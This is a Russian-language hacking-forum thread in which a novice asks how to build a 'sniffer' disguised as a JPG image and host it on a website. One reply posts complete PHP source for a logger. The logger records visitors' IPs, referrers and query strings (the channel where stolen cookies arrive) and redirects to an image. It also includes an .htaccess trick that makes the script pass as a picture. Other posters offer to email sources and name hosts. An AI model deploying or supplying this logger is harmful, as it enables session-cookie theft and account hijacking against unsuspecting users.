Вот я хотел узнать как сделать сниффер Скачал я с античата исходник , скачал perl и компилятор завожу я значит исходник в perl и получаю откомпилированный файл с расширением pl но на античате было сказано что у сниффер расширение jpg Как его сделать? А дальше допустим я зделал как заливать у меня есть конечно сайт и вот я хочу к нему прикрепить сниффер надо и лог и сниффер заливать? Объясните пожалуйста как сделать сниффер ? Мне позарез нужен свой сниффер.
Code: <? // nerezus, 2005, GPL v2 // IF U WANNA USE .png(or .gif, .jpeg) EXT FOR THIS FILE, TYPE AddType application/x-httpd-php .png TO YOUR .htaccess $log="log.txt"; $file = fopen ($log, "a+"); $qu=UrlDecode(getenv('QUERY_STRING')); $ref=UrlDecode(getenv('HTTP_REFERER')); $ip=getenv('REMOTE_ADDR'); $now = getdate(); $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds']; $str="[$nowstring] IP=$ip REFERER=$ref QUERY=$qu\n"; fputs ($file, $str); fclose($file); header('Location: image.png'); ?>
ты имеешь ввиду под компиляцие действия нажатия клавиши мыши над пунктом paste? не знал, что теперь это так называется это тоже античат =) выдели файл и нажми в контекстном меню пункт переименовать... магия =) попробуй его скопировать на сайт говорят без этого не будет работать =) кстати, чтобы работали скрипты на пхп или перл(смотря какой снифер ты выберешь), твой сервер должен поддерживать пхп или перл уже сделали тебе два, не нужно делать, используй эти скрипты =)
Понял а вот вопрос. Когда сниффер компелируешь у него сразу расширение jpg ? и ещё . Что значит заливать в cgi-bin ? И предположим я залил как узнать какой путь будет к логу? Народ поддерживает cgi-bin ?
хыхыхы -)) народ.ру - убожесвто -)) там ниче не поддерживаеца. сниффер... давай почту вышлю исходники, тебе останица тока на сервак загурзить (если бесплатно то holm.ru ). на пхп
[qoute]Когда сниффер компелируешь[/quote] ну ты извращенец, не нужно ничего компилировать(кстати, посмотри значение этого слова в словарике) твой сервер должен поддерживать пхп или перл, лучше пока возьми мой снифер и просто закачай на сервер. Сервер с поддержкой пхп. и еще: как работает PHP. http://phpfaq.ru/na_tanke
ищите внимательнее в этой теме форума посты. 2 как минимум посвещаны созданию снифера. и выложенны сорцы ))
ВОТ МОЯ ПОЧТА [email protected] и ещё если сможешь то напиши пожалуйста как его заливать чтоб он пахал.
И ещё обьясните мне пожалуйста вот мне вы дали код сниффера(исходник) что мне нужно с ним здеелать? завести в perl а чтотам ?